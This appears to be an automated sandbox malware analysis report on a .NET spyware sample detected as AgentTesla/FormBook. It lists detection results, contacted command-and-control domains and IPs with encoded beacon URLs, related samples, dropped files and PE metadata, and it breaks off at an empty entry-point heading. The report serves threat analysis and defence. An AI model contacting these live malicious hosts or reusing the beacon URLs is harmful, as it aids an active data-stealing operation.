www.moviebuff.info 209.74.77.109, 50005, 50006, 50007 MULTIBAND-NEWHOPEUS United States 23->39 41 8 other IPs or domains 23->41 61 Found direct / indirect Syscall (likely to bypass EDR) 23->61 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ZcshRk2lgh.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                ZcshRk2lgh.exe72%VirustotalBrowse
                ZcshRk2lgh.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.whisperart.net/rfcw/0%Avira URL Cloudsafe
                http://www.snehasfashion.shop/2lci/0%Avira URL Cloudsafe
                http://www.windsky.click/gybb/?-Jkp4f=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO/PgAZiplqYTotaLlxgtEc2zUWGdFSG0ILTc8yK+SY1eYqYdzLV7iMcxS&SVjx=u6ApldVh4TiTWl0%Avira URL Cloudsafe
                https://kb.fastpanel.direct/troubleshoot/0%Avira URL Cloudsafe
                http://www.moviebuff.info/4r26/?SVjx=u6ApldVh4TiTWl&-Jkp4f=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80ZqplMgmPVg/XIvRa/yHQo/zEfdJf4ghlIiV10Ap+CPKwkexekqfqMwY10%Avira URL Cloudsafe
                http://www.tempatmudisini06.click/4iun/?-Jkp4f=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywppdeeEuZCatrMvKH/wfqUumWqZ/cxrFwfzjD9bIbXwkyXSm2rk8ZQ8OQa&SVjx=u6ApldVh4TiTWl0%Avira URL Cloudsafe
                http://www.tempatmudisini06.click/4iun/0%Avira URL Cloudsafe
                http://www.sitioseguro.blog/s7xt/0%Avira URL Cloudsafe
                http://www.bookingservice.center/47f1/?-Jkp4f=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT7FZPnmIkgRyT2IIjZ1tDFAd1kYY85WNZHG4rc4iGu4bn6UDT+t8IWznL&SVjx=u6ApldVh4TiTWl0%Avira URL Cloudsafe
                http://www.windsky.click/gybb/0%Avira URL Cloudsafe
                http://www.hm35s.top/lazq/0%Avira URL Cloudsafe
                http://www.snehasfashion.shop/2lci/?SVjx=u6ApldVh4TiTWl&-Jkp4f=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDKFSbRcaZ2/tMcmtbbzmofvFf8wLCxrzsSN20Y6kXBwn9DafM4OtR1q/N0%Avira URL Cloudsafe
                https://www.cssa.auction/rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf100%Avira URL Cloudmalware
                http://www.moviebuff.info/4r26/0%Avira URL Cloudsafe
                http://www.bpgroup.site/p8wp/?SVjx=u6ApldVh4TiTWl&-Jkp4f=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrgjhE6i9RZbIooo4nNVZMxCeQfnPSfF8xtI64tEPJw4kQE2O0gU/hSVG60%Avira URL Cloudsafe
                http://www.whisperart.net0%Avira URL Cloudsafe
                http://www.hm35s.top/lazq/?-Jkp4f=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkSSnofUD+98uCWUF0f78bF04x35xFQJCgARn3b4pm0JSfuygzEuRCwX70&SVjx=u6ApldVh4TiTWl0%Avira URL Cloudsafe
                http://www.cssa.auction/rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6LhCYnHJ/8h69BUffqagUGfmBx7ZXwKHkm00gzzb3+tPgf2IZ1KdDH/EL&SVjx=u6ApldVh4TiTWl100%Avira URL Cloudmalware
                http://www.cssa.auction/rjvg/100%Avira URL Cloudmalware
                http://www.bookingservice.center/47f1/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                hm35s.top
                		154.23.184.95
                		truetrue
                  		unknown
                  www.whisperart.net
                  		199.59.243.228
                  		truefalse
                    		high
                    www.windsky.click
                    		46.253.5.221
                    		truetrue
                      		unknown
                      www.moviebuff.info
                      		209.74.77.109
                      		truetrue
                        		unknown
                        bpgroup.site
                        		74.48.143.82
                        		truetrue
                          		unknown
                          tempatmudisini06.click
                          		103.21.221.4
                          		truetrue
                            		unknown
                            snehasfashion.shop
                            		88.198.8.150
                            		truetrue
                              		unknown
                              www.sitioseguro.blog
                              		104.21.15.100
                              		truefalse
                                		high
                                cssa.auction
                                		107.167.84.42
                                		truetrue
                                  		unknown
                                  www.bookingservice.center
                                  		98.124.224.17
                                  		truefalse
                                    		high
                                    www.snehasfashion.shop
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.cssa.auction
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.bpgroup.site
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.tempatmudisini06.click
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.hm35s.top
                                            		unknown
                                            		unknownfalse
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.whisperart.net/rfcw/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.snehasfashion.shop/2lci/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.windsky.click/gybb/?-Jkp4f=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO/PgAZiplqYTotaLlxgtEc2zUWGdFSG0ILTc8yK+SY1eYqYdzLV7iMcxS&SVjx=u6ApldVh4TiTWltrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tempatmudisini06.click/4iun/?-Jkp4f=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywppdeeEuZCatrMvKH/wfqUumWqZ/cxrFwfzjD9bIbXwkyXSm2rk8ZQ8OQa&SVjx=u6ApldVh4TiTWltrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.moviebuff.info/4r26/?SVjx=u6ApldVh4TiTWl&-Jkp4f=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80ZqplMgmPVg/XIvRa/yHQo/zEfdJf4ghlIiV10Ap+CPKwkexekqfqMwY1true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tempatmudisini06.click/4iun/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.cssa.auction/rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6LhCYnHJ/8h69BUffqagUGfmBx7ZXwKHkm00gzzb3+tPgf2IZ1KdDH/EL&SVjx=u6ApldVh4TiTWltrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.sitioseguro.blog/s7xt/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.bookingservice.center/47f1/?-Jkp4f=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT7FZPnmIkgRyT2IIjZ1tDFAd1kYY85WNZHG4rc4iGu4bn6UDT+t8IWznL&SVjx=u6ApldVh4TiTWltrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.snehasfashion.shop/2lci/?SVjx=u6ApldVh4TiTWl&-Jkp4f=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDKFSbRcaZ2/tMcmtbbzmofvFf8wLCxrzsSN20Y6kXBwn9DafM4OtR1q/Ntrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.moviebuff.info/4r26/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.hm35s.top/lazq/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.windsky.click/gybb/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.cssa.auction/rjvg/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.bpgroup.site/p8wp/?SVjx=u6ApldVh4TiTWl&-Jkp4f=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrgjhE6i9RZbIooo4nNVZMxCeQfnPSfF8xtI64tEPJw4kQE2O0gU/hSVG6true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.hm35s.top/lazq/?-Jkp4f=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkSSnofUD+98uCWUF0f78bF04x35xFQJCgARn3b4pm0JSfuygzEuRCwX70&SVjx=u6ApldVh4TiTWltrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.bookingservice.center/47f1/true
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabregini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://kb.fastpanel.direct/troubleshoot/regini.exe, 0000000D.00000002.3097407112.000000000462E000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 0000000D.00000002.3099305756.0000000006200000.00000004.00000800.00020000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000002.3096520565.0000000003B1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://tempuri.org/kviskotekaDbDataSet.xsdcIgraZcshRk2lgh.exefalse
                                                    		high
                                                    http://www.whisperart.netEbjRcLZjak.exe, 0000000E.00000002.3098541538.00000000053E2000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.ecosia.org/newtab/regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.cssa.auction/rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvfregini.exe, 0000000D.00000002.3097407112.0000000004952000.00000004.10000000.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000002.3096520565.0000000003E42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://ac.ecosia.org/autocomplete?q=regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchregini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                103.21.221.4
                                                                		tempatmudisini06.clickunknown
                                                                		9905LINKNET-ID-APLinknetASNIDtrue
                                                                104.21.15.100
                                                                		www.sitioseguro.blogUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                46.253.5.221
                                                                		www.windsky.clickBulgaria
                                                                		44814BTEL-BG-ASBGtrue
                                                                209.74.77.109
                                                                		www.moviebuff.infoUnited States
                                                                		31744MULTIBAND-NEWHOPEUStrue
                                                                88.198.8.150
                                                                		snehasfashion.shopGermany
                                                                		24940HETZNER-ASDEtrue
                                                                154.23.184.95
                                                                		hm35s.topUnited States
                                                                		174COGENT-174UStrue
                                                                74.48.143.82
                                                                		bpgroup.siteCanada
                                                                		14663TELUS-3CAtrue
                                                                199.59.243.228
                                                                		www.whisperart.netUnited States
                                                                		395082BODIS-NJUSfalse
                                                                107.167.84.42
                                                                		cssa.auctionUnited States
                                                                		53755IOFLOODUStrue
                                                                98.124.224.17
                                                                		www.bookingservice.centerUnited States
                                                                		21740ENOMAS1USfalse

                                                                General Information

                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1588751
                                                                Start date and time:2025-01-11 05:08:26 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 9m 12s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Run name:Run with higher sleep bypass
                                                                Number of analysed new started processes analysed:24
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:2
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:ZcshRk2lgh.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:29f5edb28740dda7118ed53f1432f02bb5a7f809075efb5d89f90016d0eedd00.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@10/10
                                                                EGA Information:
                                                                • Successful, ratio: 75%
                                                                HCA Information:
                                                                • Successful, ratio: 90%
                                                                • Number of executed functions: 97
                                                                • Number of non-executed functions: 276
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 40.126.32.140, 40.126.32.72, 20.190.160.20, 20.190.160.22, 40.126.32.74, 40.126.32.68, 20.190.160.17, 40.126.32.138, 2.23.242.162, 13.107.246.45, 4.175.87.197, 20.109.210.53
                                                                • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                103.21.221.4BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini06.click/4iun/
                                                                rPaymentAdviceNote_pdf.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini06.click/0kli/
                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini06.click/4iun/
                                                                SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini06.click/0kli/
                                                                FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini06.click/kfzf/
                                                                Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini01.click/abla/
                                                                -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini01.click/iydt/
                                                                UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • www.tempatmudisini01.click/iydt/
                                                                RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini01.click/abla/
                                                                Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini01.click/phdl/
                                                                104.21.15.100BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                • www.sitioseguro.blog/s7xt/
                                                                SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                • www.sitioseguro.blog/k4tn/
                                                                5674656777985-069688574654 pdf.exeGet hashmaliciousFormBookBrowse
                                                                • www.sitioseguro.blog/6o0x/
                                                                46.253.5.221BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                • www.windsky.click/gybb/
                                                                5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                • www.windsky.click/3jkd/
                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                • www.windsky.click/gybb/

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                www.windsky.clickBcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                • 46.253.5.221
                                                                5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                • 46.253.5.221
                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                • 46.253.5.221
                                                                www.whisperart.netBcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                • 199.59.243.228
                                                                DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                • 199.59.243.227
                                                                SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                • 199.59.243.227
                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                • 199.59.243.227
                                                                www.moviebuff.infoBcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.109
                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.109

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                BTEL-BG-ASBGBcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                • 46.253.5.221
                                                                5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                • 46.253.5.221
                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                • 46.253.5.221
                                                                jAjWw92QKR.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                • 46.253.4.252
                                                                SecuriteInfo.com.FileRepMalware.16004.4080.exeGet hashmaliciousUnknownBrowse
                                                                • 95.169.204.138
                                                                SecuriteInfo.com.Trojan.WinGo.Agent.27329.6060.exeGet hashmaliciousUnknownBrowse
                                                                • 95.169.204.138
                                                                file.exeGet hashmaliciousGCleaner, Raccoon Stealer v2Browse
                                                                • 95.169.205.186
                                                                xzQ4Zf3975.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                • 95.169.205.186
                                                                60lAWJYfsL.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                • 95.169.205.186
                                                                http://fwtnp.dfbf.maderclean.cl/giorgiobelfiore@dececco.itGet hashmaliciousUnknownBrowse
                                                                • 185.7.219.103
                                                                CLOUDFLARENETUSydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.48.1
                                                                leUmNO9XPu.exeGet hashmaliciousHawkEye, MailPassViewBrowse
                                                                • 104.19.223.79
                                                                dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 104.21.16.1
                                                                ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 104.26.13.205
                                                                jKqPSehspS.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.32.1
                                                                A6AHI7Uk18.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.74.152
                                                                Wru9ycO2MJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.13.205
                                                                iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                                • 104.18.73.116
                                                                LINKNET-ID-APLinknetASNIDBcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                • 103.21.221.4
                                                                aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                                • 103.21.221.87
                                                                sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                • 139.10.29.3
                                                                arm4.elfGet hashmaliciousMiraiBrowse
                                                                • 139.44.142.78
                                                                momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                • 139.41.98.162
                                                                armv5l.elfGet hashmaliciousMiraiBrowse
                                                                • 139.34.88.220
                                                                DEMONS.ppc.elfGet hashmaliciousUnknownBrowse
                                                                • 139.16.152.234
                                                                loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                • 139.10.78.207
                                                                loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                • 139.24.67.215
                                                                powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 139.35.229.59
                                                                MULTIBAND-NEWHOPEUSydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.79.42
                                                                BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.107
                                                                02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 209.74.77.109
                                                                suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.109
                                                                k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.79.41
                                                                XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.79.41
                                                                BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.109
                                                                hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.79.42
                                                                5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.107
                                                                gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.79.40

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZcshRk2lgh.exe.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\ZcshRk2lgh.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1216
                                                                Entropy (8bit):5.34331486778365
                                                                Encrypted:false
                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                C:\Users\user\AppData\Local\Temp\7046-nn1K

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\regini.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                Category:modified
                                                                Size (bytes):196608
                                                                Entropy (8bit):1.1215420383712111
                                                                Encrypted:false
                                                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.7167851968389565
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:ZcshRk2lgh.exe
                                                                File size:834'048 bytes
                                                                MD5:8c6e69b99c8595bef72154984c028ade
                                                                SHA1:7f63a739e91dab69a4c3f45f3a75f6e0b0cf7b81
                                                                SHA256:29f5edb28740dda7118ed53f1432f02bb5a7f809075efb5d89f90016d0eedd00
                                                                SHA512:fdef5165cd2b89e71dab11312d6258710a97ebd8ea8f4b9ba8c1aabeff74d92822603d4a5920341cf9d2b933cd614cfc6a3bfbdc91a4b1788f45ff648a65068a
                                                                SSDEEP:12288:WC25usx+XtK1XXmiRg5VudJOYxtPle4+4y0xiZ0cC7CPMVeVkJ3TylS:qxZX2iC2dfxtP5JiZ0nCEVeJl
                                                                TLSH:5705F11632688807DAF647F40A71E1B417B96EAEB915E2DB4EC56DDFB8F2F001980713
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... Mg..............0...... ........... ........@.. ....................................@................................

                                                                File Icon

                                                                Icon Hash:5ba4a66a2a263095

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4cb7d2
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x674D20CB [Mon Dec 2 02:51:55 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
